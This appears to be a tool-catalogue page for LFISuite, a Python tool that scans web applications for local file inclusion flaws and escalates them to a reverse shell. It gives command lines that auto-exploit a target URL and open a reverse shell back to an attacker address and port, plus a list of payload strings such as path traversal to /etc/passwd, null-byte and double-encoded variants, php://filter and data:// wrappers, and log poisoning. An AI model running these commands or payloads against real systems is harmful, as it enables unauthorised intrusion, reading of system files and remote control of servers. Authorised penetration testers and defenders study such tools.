Skip to content

LFISuite

Automatic LFI exploiter and scanner

PythonGitHub

Description

LFISuite is an all-in-one LFI exploitation suite. It performs automatic scanning for LFI vulnerabilities and can escalate to reverse shell via multiple techniques including /proc/self/environ, PHP filter, log poisoning, and data:// wrapper.

Installation

BASH
git clone https://github.com/D35m0nd142/LFISuite.git
cd LFISuite
pip install -r requirements.txt

Basic Usage

BASH
# Interactive mode
python2 lfisuite.py

# Select options:
# 1. Exploiter  — exploit known LFI
# 2. Scanner    — scan for LFI
# 3. Reverse shell — LFI → RCE with reverse shell

Advanced Usage

BASH
# Auto-exploit URL
python2 lfisuite.py --exploit -u "https://target.com/page?file="

# Scan mode with URL list
python2 lfisuite.py --scan -f urls.txt

# Reverse shell through LFI
python2 lfisuite.py --revshell -u "https://target.com/page?file=" --lhost 10.0.0.1 --lport 4444

Techniques Used

  • Path traversal (../../etc/passwd)
  • Null byte injection (../../etc/passwd%00)
  • Double encoding (%252e%252e%252f)
  • PHP filter wrappers (php://filter/convert.base64-encode/resource=)
  • data:// wrapper injection
  • /proc/self/environ injection
  • Log file poisoning (/var/log/apache2/access.log)

Common Workflows

BASH
# Quick LFI scan
python2 lfisuite.py --scan -f target_urls.txt

# If LFI found, try for shell
python2 lfisuite.py --revshell -u "https://target.com/page?file=" --lhost YOUR_IP --lport 4444